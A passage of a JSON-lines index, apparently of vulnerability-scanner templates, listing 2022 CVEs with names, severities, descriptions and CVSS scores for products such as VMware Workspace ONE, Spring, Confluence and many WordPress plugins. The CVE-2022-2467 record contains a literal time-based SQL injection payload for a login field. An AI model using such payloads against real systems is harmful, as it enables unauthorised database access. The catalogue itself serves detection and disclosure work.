Workspace ONE Access - Server-Side Template Injection","Severity":"critical","Description":"VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-22954.yaml"} +{"ID":"CVE-2022-22963","Info":{"Name":"Spring Cloud - Remote Code Execution","Severity":"critical","Description":"Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-22963.yaml"} +{"ID":"CVE-2022-22965","Info":{"Name":"Spring - Remote Code Execution","Severity":"critical","Description":"Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-22965.yaml"} +{"ID":"CVE-2022-22972","Info":{"Name":"VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass","Severity":"critical","Description":"VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-22972.yaml"} +{"ID":"CVE-2022-23131","Info":{"Name":"Zabbix - SAML SSO Authentication Bypass","Severity":"critical","Description":"When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-23131.yaml"} +{"ID":"CVE-2022-23134","Info":{"Name":"Zabbix Setup Configuration Authentication Bypass","Severity":"medium","Description":"After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-23134.yaml"} +{"ID":"CVE-2022-2314","Info":{"Name":"VR Calendar \u003c 2.3.2 - Unauthenticated Arbitrary Function Call","Severity":"critical","Description":"The VR Calendar WordPress plugin through 2.3.2 lets any user execute arbitrary PHP functions on the site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-2314.yaml"} +{"ID":"CVE-2022-23178","Info":{"Name":"Crestron Device - Credentials Disclosure","Severity":"critical","Description":"An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-23178.yaml"} +{"ID":"CVE-2022-23347","Info":{"Name":"BigAnt Server v5.6.06 - Local File Inclusion","Severity":"high","Description":"BigAnt Server v5.6.06 is vulnerable to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-23347.yaml"} +{"ID":"CVE-2022-23348","Info":{"Name":"BigAnt Server v5.6.06 - Improper Access control","Severity":"medium","Description":"BigAnt Server v5.6.06 suffers from Use of Password Hash With Insufficient Computational Effort.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-23348.yaml"} +{"ID":"CVE-2022-2373","Info":{"Name":"Simply Schedule Appointments \u003c 1.5.7.7 - Email Address Disclosure","Severity":"medium","Description":"The Simply Schedule Appointments WordPress plugin before 1.5.7.7 is missing authorisation in a REST endpoint, allowing unauthenticated users to retrieve WordPress users details such as name and email address.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-2373.yaml"} +{"ID":"CVE-2022-2376","Info":{"Name":"Directorist \u003c 7.3.1 - Unauthenticated Email Address Disclosure","Severity":"medium","Description":"The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and any authenticated users","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-2376.yaml"} +{"ID":"CVE-2022-23779","Info":{"Name":"Zoho ManageEngine - Internal Hostname Disclosure","Severity":"medium","Description":"Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-23779.yaml"} +{"ID":"CVE-2022-2379","Info":{"Name":"Easy Student Results \u003c= 2.2.8 - Information Disclosure","Severity":"high","Description":"The Easy Student Results WordPress plugin through 2.2.8 lacks authorisation in its REST API, allowing unauthenticated users to retrieve information related to the courses, exams, departments as well as student's grades and PII such as email address, physical address, phone number etc.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-2379.yaml"} +{"ID":"CVE-2022-23808","Info":{"Name":"phpMyAdmin \u003c 5.1.2 - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-23808.yaml"} +{"ID":"CVE-2022-2383","Info":{"Name":"WordPress Feed Them Social \u003c3.0.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Feed Them Social plugin before 3.0.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-2383.yaml"} +{"ID":"CVE-2022-23854","Info":{"Name":"AVEVA InTouch Access Anywhere Secure Gateway - Path Traversal","Severity":"high","Description":"AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-23854.yaml"} +{"ID":"CVE-2022-23881","Info":{"Name":"ZZZCMS zzzphp 2.1.0 - Remote Code Execution","Severity":"critical","Description":"ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-23881.yaml"} +{"ID":"CVE-2022-23944","Info":{"Name":"Apache ShenYu Admin Unauth Access","Severity":"critical","Description":"Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2022/CVE-2022-23944.yaml"} +{"ID":"CVE-2022-24112","Info":{"Name":"Apache APISIX - Remote Code Execution","Severity":"critical","Description":"A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-24112.yaml"} +{"ID":"CVE-2022-24124","Info":{"Name":"Casdoor 1.13.0 - Unauthenticated SQL Injection","Severity":"high","Description":"Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-24124.yaml"} +{"ID":"CVE-2022-24129","Info":{"Name":"Shibboleth OIDC OP \u003c3.0.4 - Server-Side Request Forgery","Severity":"high","Description":"The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services.","Classification":{"CVSSScore":"8.2"}},"file_path":"cves/2022/CVE-2022-24129.yaml"} +{"ID":"CVE-2022-24181","Info":{"Name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","Severity":"medium","Description":"PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-24181.yaml"} +{"ID":"CVE-2022-24260","Info":{"Name":"VoipMonitor - Pre-Auth SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-24260.yaml"} +{"ID":"CVE-2022-24288","Info":{"Name":"Apache Airflow OS Command Injection","Severity":"high","Description":"Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-24288.yaml"} +{"ID":"CVE-2022-2467","Info":{"Name":"Garage Management System 1.0 - SQL Injection","Severity":"critical","Description":"Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-2467.yaml"} +{"ID":"CVE-2022-24681","Info":{"Name":"ManageEngine ADSelfService Plus \u003c6121 - Stored Cross-Site Scripting","Severity":"medium","Description":"ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-24681.yaml"} +{"ID":"CVE-2022-24816","Info":{"Name":"Geoserver Server - Code Injection","Severity":"critical","Description":"Programs using jt-jiffle, and allowing Jiffle script to be provided via network request, are susceptible to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project Version \u003c 1.1.22.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-24816.yaml"} +{"ID":"CVE-2022-24856","Info":{"Name":"Flyte Console \u003c0.52.0 - Server-Side Request Forgery","Severity":"high","Description":"FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-24856.yaml"} +{"ID":"CVE-2022-2486","Info":{"Name":"Wavlink WN535K2/WN535K3 - OS Command Injection","Severity":"critical","Description":"Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-2486.yaml"} +{"ID":"CVE-2022-2487","Info":{"Name":"Wavlink WN535K2/WN535K3 - OS Command Injection","Severity":"critical","Description":"Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-2487.yaml"} +{"ID":"CVE-2022-2488","Info":{"Name":"Wavlink WN535K2/WN535K3 - OS Command Injection","Severity":"critical","Description":"Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-2488.yaml"} +{"ID":"CVE-2022-24899","Info":{"Name":"Contao \u003c4.13.3 - Cross-Site Scripting","Severity":"medium","Description":"Contao prior to 4.13.3 contains a cross-site scripting vulnerability. It is possible to inject arbitrary JavaScript code into the canonical tag.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-24899.yaml"} +{"ID":"CVE-2022-24900","Info":{"Name":"Piano LED Visualizer 1.3 - Local File Inclusion","Severity":"high","Description":"Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2022/CVE-2022-24900.yaml"} +{"ID":"CVE-2022-24990","Info":{"Name":"TerraMaster TOS \u003c 4.2.30 Server Information Disclosure","Severity":"medium","Description":"TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2022/CVE-2022-24990.yaml"} +{"ID":"CVE-2022-25082","Info":{"Name":"TOTOLink - Unauthenticated Command Injection","Severity":"critical","Description":"TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-25082.yaml"} +{"ID":"CVE-2022-25216","Info":{"Name":"DVDFab 12 Player/PlayerFab - Local File Inclusion","Severity":"high","Description":"DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-25216.yaml"} +{"ID":"CVE-2022-25323","Info":{"Name":"ZEROF Web Server 2.0 - Cross-Site Scripting","Severity":"medium","Description":"ZEROF Web Server 2.0 allows /admin.back cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-25323.yaml"} +{"ID":"CVE-2022-25356","Info":{"Name":"Alt-N MDaemon Security Gateway - XML Injection","Severity":"medium","Description":"In Alt-n Security Gateway product, a malicious actor could inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. In this way the XML parser fails the validation process disclosing information such as kind of protection used (2FA), admin email and product registration keys.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-25356.yaml"} +{"ID":"CVE-2022-25369","Info":{"Name":"Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation","Severity":"critical","Description":"Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-25369.yaml"} +{"ID":"CVE-2022-2544","Info":{"Name":"Ninja Job Board \u003c 1.3.3 - Resume Disclosure via Directory Listing","Severity":"high","Description":"The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated Directory Listing which allows the download of uploaded resumes.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-2544.yaml"} +{"ID":"CVE-2022-2546","Info":{"Name":"WordPress All-in-One WP Migration \u003c=7.62 - Cross-Site Scripting","Severity":"medium","Description":"WordPress All-in-One WP Migration plugin 7.62 and prior contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2022/CVE-2022-2546.yaml"} +{"ID":"CVE-2022-25481","Info":{"Name":"ThinkPHP 5.0.24 - Information Disclosure","Severity":"high","Description":"ThinkPHP Framework v5.0.24 was discovered to be configured without the PATHINFO parameter. This allows attackers to access all system environment parameters from index.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-25481.yaml"} +{"ID":"CVE-2022-2551","Info":{"Name":"Duplicator \u003c 1.4.7 - Unauthenticated Backup Download","Severity":"high","Description":"The Duplicator WordPress plugin before 1.4.7 discloses the url of the a backup to unauthenticated visitors accessing the main installer endpoint of the plugin, if the installer script has been run once by an administrator, allowing download of the full site backup without authenticating.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-2551.yaml"} +{"ID":"CVE-2022-26134","Info":{"Name":"Confluence - Remote Code Execution","Severity":"critical","Description":"Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-26134.yaml"} +{"ID":"CVE-2022-26138","Info":{"Name":"Questions For Confluence - Hardcoded Credentials","Severity":"critical","Description":"A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-26138.yaml"} +{"ID":"CVE-2022-26148","Info":{"Name":"Grafana \u0026 Zabbix Integration - Credentials Disclosure","Severity":"critical","Description":"Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-26148.yaml"} +{"ID":"CVE-2022-26159","Info":{"Name":"Ametys CMS Information Disclosure","Severity":"medium","Description":"Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-26159.yaml"} +{"ID":"CVE-2022-26233","Info":{"Name":"Barco Control Room Management Suite \u003c=2.9 Build 0275 - Local File Inclusion","Severity":"high","Description":"Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the \"GET /..\\..\" substring.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-26233.yaml"} +{"ID":"CVE-2022-26263","Info":{"Name":"Yonyou U8 13.0 - Cross-Site Scripting","Severity":"medium","Description":"Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-26263.yaml"} +{"ID":"CVE-2022-2633","Info":{"Name":"All In One Video Gallery Plugin - Unauthenticated Arbitrary File Download \u0026 SSRF vulnerability","Severity":"","Description":"Unauthenticated Arbitrary File Download \u0026 SSRF vulnerability in WordPress All In One Video Gallery Plugin (versions \u003c= 2.6.0).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2022/CVE-2022-2633.yaml"} +{"ID":"CVE-2022-26352","Info":{"Name":"DotCMS - Arbitrary File Upload","Severity":"critical","Description":"DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-26352.yaml"} +{"ID":"CVE-2022-26564","Info":{"Name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","Severity":"medium","Description":"HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-26564.yaml"} +{"ID":"CVE-2022-26960","Info":{"Name":"elFinder \u003c=2.1.60 - Local File Inclusion","Severity":"critical","Description":"elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2022/CVE-2022-26960.yaml"} +{"ID":"CVE-2022-27593","Info":{"Name":"QNAP QTS Photo Station External Reference","Severity":"critical","Description":"An externally controlled reference to a resource vulnerability has been reported to affect QNAP NAS running Photo Station. If exploited, This could allow an attacker to modify system files. We have already fixed the vulnerability in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later\n","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2022/CVE-2022-27593.yaml"} +{"ID":"CVE-2022-27849","Info":{"Name":"WordPress Simple Ajax Chat \u003c20220116 - Sensitive Information Disclosure vulnerability","Severity":"high","Description":"WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-27849.yaml"} +{"ID":"CVE-2022-27927","Info":{"Name":"Microfinance Management System 1.0 - SQL Injection","Severity":"critical","Description":"Microfinance Management System 1.0 is susceptible to SQL Injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-27927.yaml"} +{"ID":"CVE-2022-28079","Info":{"Name":"College Management System 1.0 - SQL Injection","Severity":"high","Description":"College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-28079.yaml"} +{"ID":"CVE-2022-28080","Info":{"Name":"Royal Event - SQL Injection","Severity":"high","Description":"Royal Event is vulnerable to a SQL injection vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2022/CVE-2022-28080.yaml"} +{"ID":"CVE-2022-28219","Info":{"Name":"Zoho ManageEngine ADAudit Plus \u003c7600 - XML Entity Injection/Remote Code Execution","Severity":"critical","Description":"Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an\nunauthenticated XML entity injection attack that can lead to remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-28219.yaml"} +{"ID":"CVE-2022-28290","Info":{"Name":"WordPress Country Selector \u003c1.6.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Country Selector plugin prior to 1.6.6 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the country and lang parameters before outputting them back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-28290.yaml"} +{"ID":"CVE-2022-28363","Info":{"Name":"Reprise License Manager 14.2 - Cross-Site Scripting","Severity":"medium","Description":"Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-28363.yaml"} +{"ID":"CVE-2022-28365","Info":{"Name":"Reprise License Manager 14.2 - Information Disclosure","Severity":"medium","Description":"Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-28365.yaml"} +{"ID":"CVE-2022-2863","Info":{"Name":"WordPress WPvivid Backup \u003c 0.9.76 - Local File Inclusion","Severity":"medium","Description":"The plugin does not sanitise and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server via a Traversal attack.","Classification":{"CVSSScore":"4.9"}},"file_path":"cves/2022/CVE-2022-2863.yaml"} +{"ID":"CVE-2022-28955","Info":{"Name":"D-Link DIR816L - Access Control","Severity":"high","Description":"An access control issue in D-Link DIR816L_FW206b01 allows unauthenticated attackers to access folders folder_view.php and category_view.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-28955.yaml"} +{"ID":"CVE-2022-29004","Info":{"Name":"Diary Management System 1.0 - Cross-Site Scripting","Severity":"medium","Description":"Diary Management System 1.0 contains a cross-site scripting vulnerability via the Name parameter in search-result.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-29004.yaml"} +{"ID":"CVE-2022-29005","Info":{"Name":"Online Birth Certificate System 1.2 - Stored Cross-Site Scripting","Severity":"medium","Description":"Online Birth Certificate System 1.2 contains multiple stored cross-site scripting vulnerabilities in the component /obcs/user/profile.php, which allows an attacker to execute arbitrary web script or HTML via a crafted payload injected into the fname or lname parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-29005.yaml"} +{"ID":"CVE-2022-29006","Info":{"Name":"Directory Management System 1.0 - SQL Injection","Severity":"critical","Description":"Directory Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-29006.yaml"} +{"ID":"CVE-2022-29007","Info":{"Name":"Dairy Farm Shop Management System 1.0 - SQL Injection","Severity":"critical","Description":"Dairy Farm Shop Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-29007.yaml"} +{"ID":"CVE-2022-29009","Info":{"Name":"Cyber Cafe Management System 1.0 - SQL Injection","Severity":"critical","Description":"Cyber Cafe Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-29009.yaml"} +{"ID":"CVE-2022-29014","Info":{"Name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","Severity":"high","Description":"Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-29014.yaml"} +{"ID":"CVE-2022-29078","Info":{"Name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","Severity":"critical","Description":"Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-29078.yaml"} +{"ID":"CVE-2022-29272","Info":{"Name":"Nagios XI \u003c5.8.5 - Open Redirect","Severity":"medium","Description":"Nagios XI through 5.8.5 contains an open redirect vulnerability in the login function. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-29272.yaml"} +{"ID":"CVE-2022-29298","Info":{"Name":"SolarView Compact 6.00 - Local File Inclusion","Severity":"high","Description":"SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-29298.yaml"} +{"ID":"CVE-2022-29299","Info":{"Name":"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting","Severity":"medium","Description":"SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2022/CVE-2022-29299.yaml"} +{"ID":"CVE-2022-29301","Info":{"Name":"SolarView Compact 6.00 - 'pow' Cross-Site Scripting","Severity":"high","Description":"SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2022/CVE-2022-29301.yaml"} +{"ID":"CVE-2022-29303","Info":{"Name":"SolarView Compact 6.00 - OS Command Injection","Severity":"critical","Description":"SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-29303.yaml"} +{"ID":"CVE-2022-29349","Info":{"Name":"kkFileView 4.0.0 - Cross-Site Scripting","Severity":"medium","Description":"kkFileView 4.0.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-29349.yaml"} +{"ID":"CVE-2022-29383","Info":{"Name":"NETGEAR ProSafe SSL VPN firmware - SQL Injection","Severity":"critical","Description":"NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-29383.yaml"} +{"ID":"CVE-2022-29455","Info":{"Name":"WordPress 